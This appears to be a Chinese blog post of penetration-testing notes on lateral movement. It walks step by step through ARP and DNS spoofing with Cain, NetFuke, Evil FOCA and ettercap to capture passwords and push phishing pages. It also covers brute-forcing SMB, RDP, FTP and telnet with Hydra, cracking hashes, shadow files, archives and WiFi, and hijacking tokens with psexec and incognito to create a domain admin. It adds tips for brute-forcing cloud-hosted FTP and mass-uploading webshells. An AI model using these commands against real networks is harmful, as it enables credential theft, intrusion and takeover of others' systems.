• 04横向渗透


    流量监听工具使用
    ARP欺骗原理的利用
    常见的服务爆破
    Shell控制连接
    本地rdp密码读取

    横向渗透的方法:
    1.了解网络(信息搜集)
    分析网络中有 哪些主机(pc ,server:linux/windows,打印机.)
    服务器:分析服务,分析端口
    扫描器分析服务
    服务攻击有哪些方法:
    1.爆破 smb文件共享
    2.漏洞 smb445 ,linux22
    3.欺骗
    4.钓鱼

    PART 1: 流量监听工具使用
    流量监听工具的使用
    常用工具:
    wiresharke (网工)
    cain (渗透) 低版本服务器好用

    监听内容:(未加密的一些服务协议)
    服务连接密码
    网站登录密码
    敏感数据

    工具,嗅探分析 ---CainAbel-v4.9.53
    环境 03 抓win7 都是nat网段 207.129 /207.132
    用arp欺骗

    目前我们能抓http流量,但要抓https怎么办
    1.我们强制它转换使用http流量
    2.钓鱼

    cain (渗透:
    win7访问www.sdmm12.com/wp-admin
    03:
    start/stop Sinffer
    点击后添加需要抓取的网卡 //里边也有端口过滤,也可以修改,比如抓的http流量不是80,而是8080,非标准协议

    结果:
    207.1 物理机
    207.2 网关
    207.132 目标机
    207.255

    点击ARP进行欺骗 //扫出来后对 207.132
    点击右边空白处, 在次点击+ 添加207.2网关
    +号里点击网关后右边是从网关出去的,选到207.132,在确定,点击栏目上ARP欺骗
    这一次,03就会给win7和路由器发包进行欺骗

    如何查看是否被欺骗成功
    arp- -a //网关地址和03地址都成为一样的了

    win7输入密码
    回过03会出现07的访问报文,在最下方找到password类,就出现了07的密码
    密码包含服务器时间地址,账号密码,访问地址表单

    FTP,tetue也可以抓到


    wiresharke (网工)
    工具嗅探分析:wiresharke
    在目录里打开wireshark.exe

    栏目:抓包,网络接口开始

    过滤框输入:http 所有http流量
    输入:http&&ip.src==192.168.207.129 所有129的流量
    参数:src是我去访问. dst是访问我的
    包太对就用右键根据TCP码流 去分析
    找到登录框那种post表单打开就能看到提交的密码

    wiresharke 抓取整个内网的流量
    抓取内网不同网段进行纵向渗透
    多百度,升级版本


    PART 2: arp欺骗原理与利用
    win3欺骗win7
    常用工具:
    Netfuck
    Foca evail

    主要功能:
    域名欺骗
    网页内容欺骗
    Dns解析欺骗
    解析欺骗+钓鱼攻击案例


    Netfuck
    win7欺骗03
    老工具,配合钓鱼效果可以,低版本可以
    嗅探分析:NetFuke_1.07
    记得先装winpcap.exe

    打开软件:
    设置--嗅探设置启用:启用ARP欺骗,启用分析器,启用混杂模式监听,启用修改器,关闭转发,关闭缓冲回显,启用过滤器,主动转发
    不要点击icmp 那是ping欺骗没意义,
    选择网卡,一定要显示出网段地址

    设置-ARP欺骗--一般选择双向
    来源ip写网关.目标ip就目标的
    确定就行 ,也可以指定mac地址进行伪造

    主页插件管理小扳手里面,修改器,http网页,可以往里面写入超文本以及js钓鱼页面等
    都确定
    右上角,点击启动

    回到win7
    随便登录都会被欺骗

    配合钓鱼页面,无文件攻击,强制下载启动就会拿到权限
    ------------------------------

    Foca evail
    win7--win10可以用的可以
    需要环境dotnet461_withfix_chs.zip 在漏洞分析里
    工具嗅探分析:EvilFocaSetup.msi

    都默认安装:
    进入后就会让你选择哪个网卡,选择后直接进入,会自动在左边分析出来
    支出ipv6 ipv4 dos dns

    先来:ipv4中间人攻击--ARPipconfig
    +号选择网关 右边选择欺骗03
    确定就行start开始

    在dns劫持:
    dns劫持,劫持的是解析过程
    例如:domain:www.baidu.com
    ip:公网的钓鱼网站 192.168.124.30

    ----------------------

    ettercap

    中间人攻击 kali 攻击win7
    配置步骤:
    1、ettercap -G 打开图形界面
    2、修改 /etc/etter.conf 文件 去掉一些注释信息打开某些功能(这里开启Linux功能)
    3、打开Linux注释部分
    执行 echo 1 >
    /proc/sys/net/ipv4/ip_forward 开启转发功能


    1、启动unified sniffing
    2、选择侦听的网卡
    3、扫描存活主机
    4、查看主机列表
    5、选择攻击目标设为目标1
    6、选择网关设为目标2
    7、设置中间人
    8、设置抓包
    9、开始攻击
    10、抓取密码

    ettercap -G 打开图形界面
    选择网卡,点击对勾
    点击三个点 HSOTS
    san fohosts 扫描这个网段的主机列表
    host listl列出主机列表
    选择win7ADD to target1 网关ADD to target2
    圆圆圈--ARPpoisoning

    win7登录网页密码就能获取到了

    DNS欺骗:
    vi /etc/ettercap/etter.dns 配置这个文件
    找到 有微软.com的那一栏的下边
    添加www.baidu.com A 192.168.207.1钓鱼页面
    ettercap -G
    选择网卡,点击对勾
    点击三个点 HSOTS
    san fohosts 扫描这个网段的主机列表
    host listl列出主机列表
    选择win7ADD to target1 网关ADD to target2
    圆圆圈--ARPpoisoning
    三个点--Plugins---mange(管理插件)
    dns_spoof双击 出现*就可以了
    win7访问百度,出现跳转钓鱼页面


    命令行的使用
    ettercap -T -q -i eth0 -M arp:remote //192.168.207.132// /192.168.207.2//

    --------
    1.sssx转普
    2.百度搜索 kali 抓取https
    只能抓取能接收http和https的网站

    --------------------------------------------------
    PART 3: 服务密码攻击

    密码分析工具的使用
    Hash-identifier


    服务密码攻击
    常见的服务协议:
    smb
    telnet
    ftp
    3389
    mssql
    mysql
    等等

    服务攻击工具
    Hydra
    ftp爆破工具
    3389爆破工具
    Ssh爆破工具

    爆破后的利用分析

    密码攻击分为两种:在线密码攻击,离线密码攻击

    在线密码攻击,通过网络登录去破解
    不仅电脑性能得强,字典要强,网络要强
    -------------------------

    离线密码攻击.得到密文去加载字典本地爆破,靠cpu或者gpu性能爆破,离线爆破提升电脑性能即可
    -----------------------

    扫描端口 分析服务进行爆破攻击
    哪些服务可能被爆破:
    smb
    telnet
    ftp
    3389
    mssql
    mysql
    等等

    1 linux 22/80/443
    2 windows 135/139/445/3306/3389/1433 telnet
    如果开了这些端口,先跑445因为响应快.

    Hydra:
    hydra -l adminsitrator -P pass.txt -t 30 -vV telnet://192.168.8.155 //爆23端口
    hydra -l adminsitrator -P pass.txt -t 30 -vV smb://192.168.8.155 //爆ssb
    hydra -l adminsitrator -P pass.txt -t 30 -vV rdp://192.168.8.155 //3389

    字典:密码破解
    csdnpass 大字典
    pas 人名前500用户名字典
    pass 爆后台常用
    猪猪侠字典和工具打包
    PASS.jar 社工生成字典

    生成技巧
    爆后台:管理员邮箱,生日,电话.

    kali:crunch 4 6 zhang2008 -o pass.txt 4-6位密码用zhang2008 保存pass.txt
    /usr/share/crunch/charset.lst 这里是他字典规则,cat 可以查看
    crunch 8 8 -f /usr/share/crunch/charset.lst numeric
    --------------------------------

    离线密码破解
    Hashcat+hash-identifier
    Hashcat系列软件是比较牛逼的密码破解软件,系列软件包含Hashcat、oclHashcat;还有一个单独新出的oclRausscrack。其区别为Hashcat只支持cpu破解;oclHashcat和oclGausscrack则支持gpu加速。oclHashcat则分为AMD版和NIVDA版。

    hashcat //回车可以看帮助
    是用编号选择的
    -m 指定hash类型//例如是md5 -m 0 把我的明文字典进行加密匹配
    -a 指定爆破模式 找到[Attack Modes]攻击模式 //
    0 straight 加载字典 3 Brute-fore 边生成边爆

    用法:
    使用字典破解密码
    hashcat a.hash -m 0 -a 0 pass -o 123.txt --force
    //存放要爆破的hash文件,把密码变成md5,加载字典,密码字典,把结果输出到123.txt,强制用爆破类型


    掩码爆破:
    记住帮助里的?Charset
    l代表26个小写字符
    u代表26个大写
    d代表012345679 数字
    h代表小写16进制
    H代表大写16精致
    s代表特殊符号
    a代表把以上全部包含
    b 0*00-0*ff

    如果知道密码是纯数字就这样写
    hashcat a.txt -m 0 -a 3 ?d?d?d?d?d?d?d //就会1-8位用纯数字匹配

    如果知道密码前4位斯小写字母就这样写
    hashcat a.txt -m 0 -a 3 ?l?l?l?l?d?d?d //就会1-8位用纯数字匹配

    破解5位未知密码并且自定义密码组合
    hashcat -m 0 -a 3 test.hash --custom-charset1=xiao --custom-charset2=?d ?1?2?2?2?2
    把想用的字符写进去 例如xiao

    --custom-charset1=?l?d ?1?1?1?1?1?1?1?1 //?1就是数字和小写字母的组合 不知道几位就多些几个?1


    hash-identifier:
    这个工具是识别出密文的加密算法,例如把加密后的md5放进去就能识别出来是md5加密

    把我们的明文加密成密文,来匹配密文字典

    获得了hash之后,cmd5破解网站破解不出来的话,可以尝试本地hash离线破解

    ------------------------------
    john
    破解windows密码
    用hashdump7或者mimikatz 导出windowshash为pass.txt
    john –format=NT pass.txt

    破解Linux shadow文件
    john --format=sha512crypt shadow  //john暴力破解密码
    john --w:password.lst--format=sha512crypt shadow  //john字典暴力破解密码

    例如获取了linux里的 /etc/shadow文件里的密文
    什么情况下会获取呢?
    st2代码执行漏洞,权限会很大,可以读取的.root权限,可以读取shadow文件
    破解方法:
    cat /etc/shadow > 1.txt 先把他导入到1.txt
    john 1.txt进行爆破, 他会对文本里的东西进行自动的识别.
    john 1.txt --show 去查看他的密码

    上面是linux的演示
    现在是windows演示
    工具权限提升--windows---getpass--抓hash
    放到目标机器
    cmd切换到桌面直接启动即可.
    pudump7.exe >1.txt 可以把抓到的hash导入到桌面
    john 1.txt进行破解 这个速度还是很快的
    ----------------------------------------

    压缩包密码爆破
    Fcrackzip
    rarcrack

    apt-get install fcrackzip
    参数设置

     fcrackzip -b -c1 -u test.zip
     (-b 指定模式为暴破,-c1指定密码类型为纯数字,其它类型可以rtfm,-u这个参数非常重要不然不显示破解出来的密码,-l 5-6可以指定长度)
    命令:fcrackzip -b -ca -l 1-4 -u 压缩文件
           解释:-b 暴力破解模式 -c 指定掩码类型(a=a-z;1=0-9;!=特殊字符) -l 密码长度 -u 压缩文件名

       fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u 压缩文件名
       解释:-D 为使用字典  -p为使用字符串作为初始密码文件

    fcrackzip -b -c1 -l 1-6 -u 12.zip
    fcrackzip -b -ca -l 1-9 -u 1.zip

    --------------------------------
    rarcrack
    该软件用于暴力破解压缩文件的密码,但仅支持RAR, ZIP, 7Z这三种类型的压缩包
    执行命令: rarcrack 文件名 -threads 线程数 -type rar|zip|7z

    rarcrack test.rar --10 --rar


    如果允许出现错误
    那么可以执行sudo apt-get install libxml2-dev libxslt-dev进行修复。
    --------------------------

    Wifi密码破解 //最好买一个usb的wifi网卡,然后在禁用本地的网卡.这样本地的mac不会被抓取

    输入:ifconfig 查看网卡
    第一步:先输入airmon-ng check kill结束进程
    第二步:输入:airmon-ng start wlan0(对应网卡) 开启监听模式
    第三步:他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0
    第四步:建立监听 airodump-ng wlan0mon 记住信道 名称和mac地址 CH MAC
    第五步:airodump-ng -c 4 -w result --bssid 目标mac wlan0mon 抓包
    第六步:aireplay-ng -0 10 -a 目标ap的mac -c 客户端mac wlan0mon
    第七步:aircrack-ng -w 字典文件 捕获cap数据库文件 xx.cap
    --------------------------------------------------

    ftp爆破工具
    密码破解ftp等爆破
    hscangui汉化版..exe
    打开后左下角菜单选中模块---里面勾选ftp
    参数 ,指定要跑的网段
    开始跑就可以了

    为什么要爆ftp
    web服务器 ,要分析搭建平台,如果是iis自带的fit那爆破了作用也不大

    阿里云的如果爆出404 他会把你的路径爆出来,路径的最后一节就是用户
    c:/inetwpud/www/qxe123123/ qwe123123就是用户名称
    qwe12312 ftp用户 数据库用户 ,虚拟空间用户 三合一的
    阿里云是拦截速度的,所有买个阿里云的白名单去跑阿里云/实验室/运营机房这些ip
    上面是自带的.

    下面是自己装的
    软件集成搭建的网站
    ftp服务器的软件是 g6 serveru filezilla //这一类网站 大多都有测试账号,ceshi/test/admin,要不账号密码一样,要不密码弱口令
    拿到测试的账号就可以批量写马,写个脚本,列出所有二级目录,挨个上传即可. 有21端口就链接看看 ftp 192.513.135.123 版本低的最好去尝试爆破一下


    工具3389
    太慢了 还不如爆445


    Phpmyadmin爆破
    搞站会用 ,也可以ip/Phpmyadmin
    ip888 999 9999 7777


    PART 4: shell控制连接
    爆破成功之后 445 去链接的
    内网安全里psexec.exe

    获取本地账号密码,构造跳板
    获取明文密码可以用getpss.exe
    获取账号hash可以用pwdum7
    通过得到的账号密码信息链接跳板机
    psexec.exe \192.168.207.129 -u hao123 -p 123123 cmd
    psexec.exe \192.168.200.11 -u administrator -p 123123 cmd 开启防火墙就链接不上

    内网安全里 incognito2 密码123
    incognito.exe list_tokens -u 查看本机可以利用的token //普通用户也可以调用的
    incognito.exe -h 192.168.207.129 -u admin -p 123123 list_tokens -u 查看远程机器可以利用的token
    C:incognito2>incognito.exe -h 192.168.200.11 -u admin -p 123123 execute -c "NT
    AUTHORITYSYSTEM" cmd.exe 调用远程机器的本地系统权限的cmd.exe

    链接后可用pawoshell远程调用命令把文件下载进去

    如果普通用户 不行的话就用msf的incognto2 貌似,盗版链接不上 ,正版可以链接.


    查找被攻击的计算机中是否有DA的token
    incognito.exe -h 192.168.200.11 -u admin -p 123123 list_tokens -u 查看远程机器可以利用的token

    利用DA的token创建新的DA
    C:incognito2>incognito.exe -h 192.168.200.11 -u admin -p 123123 execute -c "CRA
    CERADMINISTRATOR" cmd.exe 调用DA的cmd.exe //劫持域的身份
    执行创建DA命令
    Net user x 123.com /add /domain 用域的身份创建用户
    Net group “domain admins” x /add /domain 把x用户 加入到管理员组

    1.扫描端口
    2.爆破445
    3.可以使用psexec 登录 cmd
    4.incognito 劫持token 如果有域管理员token 劫持da 创建一个

     https://github.com/604238181/-

  • 相关阅读:
    《TomCat与Java Web开发技术详解》(第二版) 第六章节的学习总结 ---- JSP技术
    《Lucene in Action 第二版》第三章节的学习总结----IndexSearcher以及Term和QueryParser
    《TomCat与Java Web开发技术详解》(第二版) 第六章节对应CD附带的helloapp无法启动的问题解决
    《TomCat与Java Web开发技术详解》(第二版) 第五章节的学习总结 ---- Servlet的高级用法
    《Lucene in Action》(第二版) 第二章节的学习总结 ---- IndexWriter+Document+Field
    《Lucene in Action》(第二版) 第一章节的学习总结 ---- 用最少的代码创建索引和搜索
    Windows Server 2008 R2 配置AD(Active Directory)域控制器
    Windows Server 2008 R2 负载平衡入门篇
    Asp.net MVC 的八个扩展点
    C# 使用memcache(memcache安装)
  • 原文地址:https://www.cnblogs.com/fanghan/p/14033761.html
Copyright © 2020-2023  润新知